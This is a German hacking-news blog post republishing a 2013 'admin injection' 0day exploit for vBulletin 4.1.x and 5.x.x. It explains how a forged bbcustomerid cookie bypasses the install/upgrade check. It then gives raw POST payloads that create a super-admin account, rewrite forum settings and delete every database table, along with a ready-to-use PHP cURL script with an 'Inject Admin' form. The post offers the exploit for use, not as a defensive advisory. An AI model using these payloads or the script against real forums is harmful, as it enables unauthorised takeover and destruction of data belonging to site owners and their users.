vBulletin 4.1.x / 5.x.x Upgrade Exploit (Admin Injection)

Veröffentlicht von ¥akuza112am 22. August 2013in : VulnerabilitiesTags: Ajax, Amp, Bitch, Boxhead, Customer Number, Ghost, Html Code, Injection Time, Login Screen, Lt, Md5 Hash, Php Script, Php Urlencode, Set Cookie, Setcookie, Software Version, Step 1, Step 2, VbulletinKeine Kommentare

Time to release this bitch…

Video: http://belegit.net/vBulletin_Upgrade…e_Exploit.html

Code:

# Exploit Title: vBulletin Admin Injection 0day
# Date: 22/08/2013
# Author(s): BoxHead
# Website: http://belegit.net 
# Product: vBulletin
# Software Version 4.1.x< & 5.x.x
# Thanks Ghost for writing the text file up for me :) + Enjoy the PHP script which makes it 100x easier to use.... 

Where it's vuln
----------------

# in vbulletin-upgrade.js The md5 hash of the customer number is set as a cookie after successfully entering into install/upgrade area.

 &firstrun=true&step=1

 &customerid=" + PHP.urlencode(CUSTNUMBER) +"&firstrun=true&step=1&startat=0&only=0
 setcookie('bbcustomerid', $this->custnumber, 0, '/', ''); 

# in class_upgrade_ajax.php the customer number hash is present and can be viewed in the source of install.php and upgrade.php next to VAR CUSTOMERID

 $this->custnumber = (strlen('f2b7ed1958f6d313a01814de73f0e3f5') == 32) ? 'f2b7ed1958f6d313a01814de73f0e3f5' : md5(strtoupper('f2b7ed1958f6d313a01814de73f0e3f5'));

# Combining these 2 facts means it's possible to bypass the customer number pop up by creating a cookie called bbcustomerid with the hash as it's contents.
# vBulletin is tricked into believing you have already successfully entered the correct customer number into the login screen and allows you to continue.

-------------------------------------------------------------
Step 1 = Cookie Created with original MD5 Hash (Bypass Panel)
-------------------------------------------------------------

 customerid=J728354D506F&step=0&startat=0&only=0
 Set-Cookie: bbcustomerid=f2b7ed1958f6d313a01814de73f0e3f5; path=/

-------------------------------------------------
Step 2 = install/upgrade.php (Add New Super User)
-------------------------------------------------

Submit the POST
 POST DATA: ajax=1&version=install&checktable=false&firstrun=false&step=7&startat=0&only=false&customerid=f2b7ed1958f6d313a01814de73f0e3f5&options[skiptemplatemerge]=0&&response=yes&htmlsubmit=1&htmldata[username]=TheJoker&htmldata[password]=lulz&htmldata[confirmpassword]=lulz&htmldata[email][email protected]&

# ajax=1 (Assuming it means ajax is enabled)
# &version=install (First stage of installation process)
# &checktable=false
# &firstrun=false (Enables Full Install, not just Template Upgrades)
# &step=7 (Step in installation phase that creates Admin account)
# &startat=0 (Never changes, Dunno why)
# &only=false (Fuck knows)
# &customerid= (Substite for the value in bbcustomerid cookie)
# &options[skiptemplatemerge]=0 (Not a clue if we really need it, doubt it)
# &&response=yes
# &htmlsubmit=1 (Submits New User Data)
# &htmldata[username]= (The User you want to add)
# &htmldata[password]= (Set Password for User in Plaintext)
# &htmldata[confirmpassword]= (Must match above)
# &htmldata[email]= (Set email for User)

-------------------------------------------------
Step 2 = install/upgrade.php (Edit Forum Options)
-------------------------------------------------

Submit the POST
 POST DATA: ajax=1&version=install&checktable=false&firstrun=false&step=5&startat=0&only=false&customerid=f2b7ed1958f6d313a01814de73f0e3f5&options[skiptemplatemerge]=0&&response=yes&htmlsubmit=1&htmldata[bbtitle]=Forums&htmldata[hometitle]=Home&htmldata[bburl]=http%3A//www.homepage.com/forum.php&htmldata[homeurl]=http%3A//www.homepage.com&htmldata[webmasteremail][email protected]

# ajax=1 (Assuming it means ajax is enabled)
# &version=install (First stage of installation process)
# &checktable=false
# &firstrun=false (Enables Full Install, not just Template Upgrades)
# &step=5 (Step in installation phase that edits Forum Options)
# &startat=0 (Never changes, Dunno why)
# &only=false (Fuck knows)
# &customerid= (Substite for the value in bbcustomerid cookie)
# &options[skiptemplatemerge]=0 (Not a clue if we really need it, doubt it)
# &&response=yes
# &htmlsubmit=1 (Submits New User Data)
# &htmldata[bbtitle]= (Board Title)
# &htmldata[hometitle]= (Homepage Title)
# &htmldata[bburl]= (Forum Url)
# &htmldata[homeurl]= (Homepage Url)
# &htmldata[webmasteremail]= (Webmasters Email)

---------------------------------------------
Step 2 = install/upgrade.php (Clear Database)
---------------------------------------------

Submit the POST
 POST DATA: ajax=1&version=install&checktable=false&firstrun=false&step=1&startat=0&only=false&customerid=f2b7ed1958f6d313a01814de73f0e3f5&options[skiptemplatemerge]=0&&response=yes&htmlsubmit=1&htmldata[]=access&htmldata[]=action&htmldata[]=activitystream&htmldata[]=activitystreamtype&htmldata[]=ad&htmldata[]=adcriteria&htmldata[]=adminhelp&htmldata[]=administrator&htmldata[]=adminlog&htmldata[]=adminmessage&htmldata[]=adminutil&htmldata[]=album&htmldata[]=albumupdate&htmldata[]=announcement&htmldata[]=announcementread&htmldata[]=apiclient&htmldata[]=apilog&htmldata[]=apipost&htmldata[]=attachment&htmldata[]=attachmentcategory&htmldata[]=attachmentcategoryuser&htmldata[]=attachmentpermission&htmldata[]=attachmenttype&htmldata[]=attachmentviews&htmldata[]=autosave&htmldata[]=avatar&htmldata[]=bbcode&htmldata[]=bbcode_video&htmldata[]=block&htmldata[]=blockconfig&htmldata[]=blocktype&htmldata[]=blog&htmldata[]=blog_attachmentlegacy&htmldata[]=blog_category&htmldata[]=blog_categorypermission&htmldata[]=blog_categoryuser&htmldata[]=blog_custom_block&htmldata[]=blog_custom_block_parsed&htmldata[]=blog_deletionlog&htmldata[]=blog_editlog&htmldata[]=blog_featured&htmldata[]=blog_groupmembership&htmldata[]=blog_grouppermission&htmldata[]=blog_hash&htmldata[]=blog_moderation&htmldata[]=blog_moderator&htmldata[]=blog_pinghistory&htmldata[]=blog_rate&htmldata[]=blog_read&htmldata[]=blog_relationship&htmldata[]=blog_search&htmldata[]=blog_searchresult&htmldata[]=blog_sitemapconf&htmldata[]=blog_subscribeentry&htmldata[]=blog_subscribeuser&htmldata[]=blog_summarystats&htmldata[]=blog_tachyentry&htmldata[]=blog_text&htmldata[]=blog_textparsed&htmldata[]=blog_trackback&htmldata[]=blog_trackbacklog&htmldata[]=blog_user&htmldata[]=blog_usercss&htmldata[]=blog_usercsscache&htmldata[]=blog_userread&htmldata[]=blog_userstats&htmldata[]=blog_views&htmldata[]=blog_visitor&htmldata[]=bookmarksite&htmldata[]=cache&htmldata[]=cacheevent&htmldata[]=calendar&htmldata[]=calendarcustomfield&htmldata[]=calendarmoderator&htmldata[]=calendarpermission&htmldata[]=cms_article&htmldata[]=cms_category&htmldata[]=cms_grid&htmldata[]=cms_layout&htmldata[]=cms_layoutwidget&htmldata[]=cms_navigation&htmldata[]=cms_node&htmldata[]=cms_nodecategory&htmldata[]=cms_nodeconfig&htmldata[]=cms_nodeinfo&htmldata[]=cms_permissions&htmldata[]=cms_rate&htmldata[]=cms_sectionorder&htmldata[]=cms_widget&htmldata[]=cms_widgetconfig&htmldata[]=cms_widgettype&htmldata[]=contentpriority&htmldata[]=contentread&htmldata[]=contenttype&htmldata[]=cpsession&htmldata[]=cron&htmldata[]=cronlog&htmldata[]=customavatar&htmldata[]=customprofile&htmldata[]=customprofilepic&htmldata[]=datastore&htmldata[]=dbquery&htmldata[]=deletionlog&htmldata[]=discussion&htmldata[]=discussionread&htmldata[]=editlog&htmldata[]=event&htmldata[]=externalcache&htmldata[]=faq&htmldata[]=filedata&htmldata[]=forum&htmldata[]=forumpermission&htmldata[]=forumprefixset&htmldata[]=forumread&htmldata[]=forumrunner_push_data&htmldata[]=forumrunner_push_users&htmldata[]=groupmessage&htmldata[]=groupmessage_hash&htmldata[]=groupread&htmldata[]=holiday&htmldata[]=humanverify&htmldata[]=hvanswer&htmldata[]=hvquestion&htmldata[]=icon&htmldata[]=imagecategory&htmldata[]=imagecategorypermission&htmldata[]=indexqueue&htmldata[]=infraction&htmldata[]=infractionban&htmldata[]=infractiongroup&htmldata[]=infractionlevel&htmldata[]=ipdata&htmldata[]=language&htmldata[]=mailqueue&htmldata[]=moderation&htmldata[]=moderator&htmldata[]=moderatorlog&htmldata[]=navigation&htmldata[]=notice&htmldata[]=noticecriteria&htmldata[]=noticedismissed&htmldata[]=package&htmldata[]=passwordhistory&htmldata[]=paymentapi&htmldata[]=paymentinfo&htmldata[]=paymenttransaction&htmldata[]=phrase&htmldata[]=phrasetype&htmldata[]=picturecomment&htmldata[]=picturecomment_hash&htmldata[]=picturelegacy&htmldata[]=plugin&htmldata[]=pm&htmldata[]=pmreceipt&htmldata[]=pmtext&htmldata[]=pmthrottle&htmldata[]=podcast&htmldata[]=podcastitem&htmldata[]=poll&htmldata[]=pollvote&htmldata[]=post&htmldata[]=postedithistory&htmldata[]=posthash&htmldata[]=postlog&htmldata[]=postparsed&htmldata[]=postrelease&htmldata[]=prefix&htmldata[]=prefixpermission&htmldata[]=prefixset&htmldata[]=product&htmldata[]=productcode&htmldata[]=productdependency&htmldata[]=profileblockprivacy&htmldata[]=profilefield&htmldata[]=profilefieldcategory&htmldata[]=profilevisitor&htmldata[]=ranks&htmldata[]=reminder&htmldata[]=reputation&htmldata[]=reputationlevel&htmldata[]=route&htmldata[]=rssfeed&htmldata[]=rsslog&htmldata[]=searchcore&htmldata[]=searchcore_text&htmldata[]=searchgroup&htmldata[]=searchgroup_text&htmldata[]=searchlog&htmldata[]=session&htmldata[]=setting&htmldata[]=settinggroup&htmldata[]=sigparsed&htmldata[]=sigpic&htmldata[]=skimlinks&htmldata[]=smilie&htmldata[]=socialgroup&htmldata[]=socialgroupcategory&htmldata[]=socialgroupicon&htmldata[]=socialgroupmember&htmldata[]=spamlog&htmldata[]=stats&htmldata[]=strikes&htmldata[]=style&htmldata[]=stylevar&htmldata[]=stylevardfn&htmldata[]=subscribediscussion&htmldata[]=subscribeevent&htmldata[]=subscribeforum&htmldata[]=subscribegroup&htmldata[]=subscribethread&htmldata[]=subscription&htmldata[]=subscriptionlog&htmldata[]=subscriptionpermission&htmldata[]=tachyforumcounter&htmldata[]=tachyforumpost&htmldata[]=tachythreadcounter&htmldata[]=tachythreadpost&htmldata[]=tag&htmldata[]=tagcontent&htmldata[]=tagsearch&htmldata[]=template&htmldata[]=templatehistory&htmldata[]=templatemerge&htmldata[]=thread&htmldata[]=threadrate&htmldata[]=threadread&htmldata[]=threadredirect&htmldata[]=threadviews&htmldata[]=upgradelog&htmldata[]=user&htmldata[]=useractivation&htmldata[]=userban&htmldata[]=userchangelog&htmldata[]=usercss&htmldata[]=usercsscache&htmldata[]=userfield&htmldata[]=usergroup&htmldata[]=usergroupleader&htmldata[]=usergrouprequest&htmldata[]=userlist&htmldata[]=usernote&htmldata[]=userpromotion&htmldata[]=usertextfield&htmldata[]=usertitle&htmldata[]=visitormessage&htmldata[]=visitormessage_hash&

# ajax=1 (Assuming it means ajax is enabled)
# &version=install (First stage of installation process)
# &checktable=false
# &firstrun=false (Enables Full Install, not just Template Upgrades)
# &step=1 (Step in installation phase that removes tables)
# &startat=0 (Never changes, Dunno why)
# &only=false (Fuck knows)
# &customerid= (Substite for the value in bbcustomerid cookie)
# &options[skiptemplatemerge]=0 (Not a clue if we really need it, doubt it)
# &&response=yes
# &htmlsubmit=1 (Submits New User Data)
# &htmldata[]= (Select Tables - See below)
  &htmldata[]=access
  &htmldata[]=action
  &htmldata[]=activitystream
  &htmldata[]=activitystreamtype
  &htmldata[]=ad
  &htmldata[]=adcriteria
  &htmldata[]=adminhelp
  &htmldata[]=administrator
  &htmldata[]=adminlog
  &htmldata[]=adminmessage
  &htmldata[]=adminutil
  &htmldata[]=album
  &htmldata[]=albumupdate
  &htmldata[]=announcement
  &htmldata[]=announcementread
  &htmldata[]=apiclient
  &htmldata[]=apilog
  &htmldata[]=apipost
  &htmldata[]=attachment
  &htmldata[]=attachmentcategory
  &htmldata[]=attachmentcategoryuser
  &htmldata[]=attachmentpermission
  &htmldata[]=attachmenttype
  &htmldata[]=attachmentviews
  &htmldata[]=autosave
  &htmldata[]=avatar
  &htmldata[]=bbcode
  &htmldata[]=bbcode_video
  &htmldata[]=block
  &htmldata[]=blockconfig
  &htmldata[]=blocktype
  &htmldata[]=blog
  &htmldata[]=blog_attachmentlegacy
  &htmldata[]=blog_category
  &htmldata[]=blog_categorypermission
  &htmldata[]=blog_categoryuser
  &htmldata[]=blog_custom_block
  &htmldata[]=blog_custom_block_parsed
  &htmldata[]=blog_deletionlog
  &htmldata[]=blog_editlog
  &htmldata[]=blog_featured
  &htmldata[]=blog_groupmembership
  &htmldata[]=blog_grouppermission
  &htmldata[]=blog_hash
  &htmldata[]=blog_moderation
  &htmldata[]=blog_moderator
  &htmldata[]=blog_pinghistory
  &htmldata[]=blog_rate
  &htmldata[]=blog_read
  &htmldata[]=blog_relationship
  &htmldata[]=blog_search
  &htmldata[]=blog_searchresult
  &htmldata[]=blog_sitemapconf
  &htmldata[]=blog_subscribeentry
  &htmldata[]=blog_subscribeuser
  &htmldata[]=blog_summarystats
  &htmldata[]=blog_tachyentry
  &htmldata[]=blog_text
  &htmldata[]=blog_textparsed
  &htmldata[]=blog_trackback
  &htmldata[]=blog_trackbacklog
  &htmldata[]=blog_user
  &htmldata[]=blog_usercss
  &htmldata[]=blog_usercsscache
  &htmldata[]=blog_userread
  &htmldata[]=blog_userstats
  &htmldata[]=blog_views
  &htmldata[]=blog_visitor
  &htmldata[]=bookmarksite
  &htmldata[]=cache
  &htmldata[]=cacheevent
  &htmldata[]=calendar
  &htmldata[]=calendarcustomfield
  &htmldata[]=calendarmoderator
  &htmldata[]=calendarpermission
  &htmldata[]=cms_article
  &htmldata[]=cms_category
  &htmldata[]=cms_grid
  &htmldata[]=cms_layout
  &htmldata[]=cms_layoutwidget
  &htmldata[]=cms_navigation
  &htmldata[]=cms_node
  &htmldata[]=cms_nodecategory
  &htmldata[]=cms_nodeconfig
  &htmldata[]=cms_nodeinfo
  &htmldata[]=cms_permissions
  &htmldata[]=cms_rate
  &htmldata[]=cms_sectionorder
  &htmldata[]=cms_widget
  &htmldata[]=cms_widgetconfig
  &htmldata[]=cms_widgettype
  &htmldata[]=contentpriority
  &htmldata[]=contentread
  &htmldata[]=contenttype
  &htmldata[]=cpsession
  &htmldata[]=cron
  &htmldata[]=cronlog 
  &htmldata[]=customavatar  
  &htmldata[]=customprofile 
  &htmldata[]=customprofilepic 
  &htmldata[]=datastore 
  &htmldata[]=dbquery 
  &htmldata[]=deletionlog 
  &htmldata[]=discussion 
  &htmldata[]=discussionread 
  &htmldata[]=editlog 
  &htmldata[]=event 
  &htmldata[]=externalcache 
  &htmldata[]=faq 
  &htmldata[]=filedata 
  &htmldata[]=forum 
  &htmldata[]=forumpermission 
  &htmldata[]=forumprefixset 
  &htmldata[]=forumread 
  &htmldata[]=forumrunner_push_data 
  &htmldata[]=forumrunner_push_users 
  &htmldata[]=groupmessage 
  &htmldata[]=groupmessage_hash 
  &htmldata[]=groupread 
  &htmldata[]=holiday 
  &htmldata[]=humanverify 
  &htmldata[]=hvanswer 
  &htmldata[]=hvquestion 
  &htmldata[]=icon 
  &htmldata[]=imagecategory 
  &htmldata[]=imagecategorypermission 
  &htmldata[]=indexqueue 
  &htmldata[]=infraction 
  &htmldata[]=infractionban 
  &htmldata[]=infractiongroup 
  &htmldata[]=infractionlevel 
  &htmldata[]=ipdata 
  &htmldata[]=language 
  &htmldata[]=mailqueue 
  &htmldata[]=moderation 
  &htmldata[]=moderator 
  &htmldata[]=moderatorlog 
  &htmldata[]=navigation 
  &htmldata[]=notice 
  &htmldata[]=noticecriteria 
  &htmldata[]=noticedismissed 
  &htmldata[]=package 
  &htmldata[]=passwordhistory 
  &htmldata[]=paymentapi 
  &htmldata[]=paymentinfo 
  &htmldata[]=paymenttransaction 
  &htmldata[]=phrase 
  &htmldata[]=phrasetype 
  &htmldata[]=picturecomment 
  &htmldata[]=picturecomment_hash 
  &htmldata[]=picturelegacy 
  &htmldata[]=plugin 
  &htmldata[]=pm 
  &htmldata[]=pmreceipt 
  &htmldata[]=pmtext 
  &htmldata[]=pmthrottle 
  &htmldata[]=podcast 
  &htmldata[]=podcastitem 
  &htmldata[]=poll 
  &htmldata[]=pollvote 
  &htmldata[]=post 
  &htmldata[]=postedithistory 
  &htmldata[]=posthash 
  &htmldata[]=postlog 
  &htmldata[]=postparsed 
  &htmldata[]=postrelease 
  &htmldata[]=prefix 
  &htmldata[]=prefixpermission 
  &htmldata[]=prefixset 
  &htmldata[]=product 
  &htmldata[]=productcode 
  &htmldata[]=productdependency 
  &htmldata[]=profileblockprivacy 
  &htmldata[]=profilefield 
  &htmldata[]=profilefieldcategory 
  &htmldata[]=profilevisitor 
  &htmldata[]=ranks 
  &htmldata[]=reminder 
  &htmldata[]=reputation 
  &htmldata[]=reputationlevel 
  &htmldata[]=route 
  &htmldata[]=rssfeed 
  &htmldata[]=rsslog 
  &htmldata[]=searchcore 
  &htmldata[]=searchcore_text 
  &htmldata[]=searchgroup 
  &htmldata[]=searchgroup_text 
  &htmldata[]=searchlog 
  &htmldata[]=session 
  &htmldata[]=setting 
  &htmldata[]=settinggroup 
  &htmldata[]=sigparsed 
  &htmldata[]=sigpic 
  &htmldata[]=skimlinks 
  &htmldata[]=smilie 
  &htmldata[]=socialgroup 
  &htmldata[]=socialgroupcategory 
  &htmldata[]=socialgroupicon 
  &htmldata[]=socialgroupmember 
  &htmldata[]=spamlog 
  &htmldata[]=stats 
  &htmldata[]=strikes 
  &htmldata[]=style 
  &htmldata[]=stylevar 
  &htmldata[]=stylevardfn 
  &htmldata[]=subscribediscussion 
  &htmldata[]=subscribeevent 
  &htmldata[]=subscribeforum 
  &htmldata[]=subscribegroup 
  &htmldata[]=subscribethread 
  &htmldata[]=subscription 
  &htmldata[]=subscriptionlog 
  &htmldata[]=subscriptionpermission 
  &htmldata[]=tachyforumcounter 
  &htmldata[]=tachyforumpost 
  &htmldata[]=tachythreadcounter 
  &htmldata[]=tachythreadpost 
  &htmldata[]=tag 
  &htmldata[]=tagcontent 
  &htmldata[]=tagsearch 
  &htmldata[]=template 
  &htmldata[]=templatehistory 
  &htmldata[]=templatemerge 
  &htmldata[]=thread 
  &htmldata[]=threadrate 
  &htmldata[]=threadread 
  &htmldata[]=threadredirect 
  &htmldata[]=threadviews 
  &htmldata[]=upgradelog 
  &htmldata[]=user 
  &htmldata[]=useractivation 
  &htmldata[]=userban 
  &htmldata[]=userchangelog 
  &htmldata[]=usercss 
  &htmldata[]=usercsscache 
  &htmldata[]=userfield 
  &htmldata[]=usergroup 
  &htmldata[]=usergroupleader 
  &htmldata[]=usergrouprequest 
  &htmldata[]=userlist 
  &htmldata[]=usernote 
  &htmldata[]=userpromotion 
  &htmldata[]=usertextfield 
  &htmldata[]=usertitle 
  &htmldata[]=visitormessage 
  &htmldata[]=visitormessage_hash

-------------------------
Step 3 = XML Confirmation
-------------------------

Confirmation of your request will inject data into the Database.

---------------
Step 4 - Extras
----------------

Spawning of Persistant XSS in Titles
SQL injection of other Admin Users

PHP Exploit Script

Code:

<h1>vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit</h1>
<p>Created by: Boxhead</p>
<p>Found on: 08/22/2013</p>
<p>Website: <a href="http://belegit.net" target="_blank">http://belegit.net</a></p>
<br>
<?php
//extract data from the post
if(isset($_POST['submit'])){
extract($_POST);

//set POST variables
$url = $_POST['url'];
$fields = array(
						'ajax' => urlencode('1'),
						'version' => urlencode('install'),
						'checktable' => urlencode('false'),
						'firstrun' => urlencode('false'),
						'step' => urlencode('7'),
						'startat' => urlencode('0'),
						'only' => urlencode('false'),
						'customerid' => urlencode($_POST['customerid']),
						'options[skiptemplatemerge]' => urlencode('0'),
						'response' => urlencode('yes'),
						'htmlsubmit' => urlencode('1'),
						'htmldata[username]' => urlencode($_POST['username']),
						'htmldata[password]' => urlencode($_POST['password']),
						'htmldata[confirmpassword]' => urlencode($_POST['password']),
						'htmldata[email]' => urlencode($_POST['email'])
				);

//url-ify the data for the POST
foreach($fields as $key=>$value) { $fields_string .= $key.'='.$value.'&'; }
rtrim($fields_string, '&');

//open connection
$ch = curl_init();

//set the url, number of POST vars, POST data
curl_setopt($ch,CURLOPT_URL, $url);
curl_setopt($ch,CURLOPT_POST, count($fields));
curl_setopt($ch,CURLOPT_POSTFIELDS, $fields_string);
curl_setopt($ch, CURLOPT_COOKIESESSION, TRUE);
curl_setopt($ch, CURLOPT_COOKIE, 'bbcustomerid='.$_POST['customerid'] );

//execute post
$result = curl_exec($ch);

//close connection
curl_close($ch);
exit();
}
?>
<center>
<form name="sploit" method="POST" action="<?php echo $_SERVER['REQUEST_URI']; ?>">
<span>Example:http://test.com/forum/install/upgrade.php</span><br>
  <span>Website:</span>
    <input name="url" type="text" tabindex="1" size="60" />
    <br>
    <span>Customer ID:</span>
    <input name="customerid" type="text" tabindex="2" size="40" />
    <br>
    <span>Username:</span>
    <input name="username" type="text" tabindex="3" size="40" />
    <br>
    <span>Password:</span>
    <input name="password" type="text" tabindex="4" size="40" />
    <br>
    <span>Email:</span>
    <input name="email" type="text" tabindex="5" maxlength="40" />

<input name="submit" type="submit" value="Inject Admin">
</form>
</center>

¥akuza112

Ich beschäftige mich größtenteils mit aktuellen Nachrichten bzgl. Hacking, Cracking & Security, sowie Globalen und Scene News. Wir haben uns nicht unterkriegen lassen und sind trotz vieler Drohungen, Ddos Attacken usw. seit August 2010 online. Die Privatsphäre unserer Leser liegt uns sehr am Herzen, weswegen wir keinerlei Nutzerdaten (in Form von IP Adressen) unserer Nutzer in der Datenbank speichern. Falls Sie Fragen, Anregungen oder Kritik haben, schicken Sie mir doch einfach eine Nachricht. Weitere Kontaktmöglichkeiten finden Sie auf yakuza112.org.

Kreditkartenbetrug : Duo nach millionenschwerem Cyber-Coup vor Gericht

LKA Schleswig-Holstein nimmt Beschuldigten von Cybercrime-Delikten fest

Über den Autor

¥akuza112

Ähnliche Artikel

Hinterlasse eine Antwort Breche Antwort ab

vBulletin 4.1.x / 5.x.x Upgrade Exploit (Admin Injection)

Kreditkartenbetrug : Duo nach millionenschwerem Cyber-Coup vor Gericht

LKA Schleswig-Holstein nimmt Beschuldigten von Cybercrime-Delikten fest

Über den Autor

¥akuza112

Ähnliche Artikel

Spammer mit Fail2Ban und Antispam Bee loswerden

vBulletin Forum Shell Injection

MySQL – für Anfänger #8 – Verbindung beenden

Hinterlasse eine Antwort Breche Antwort ab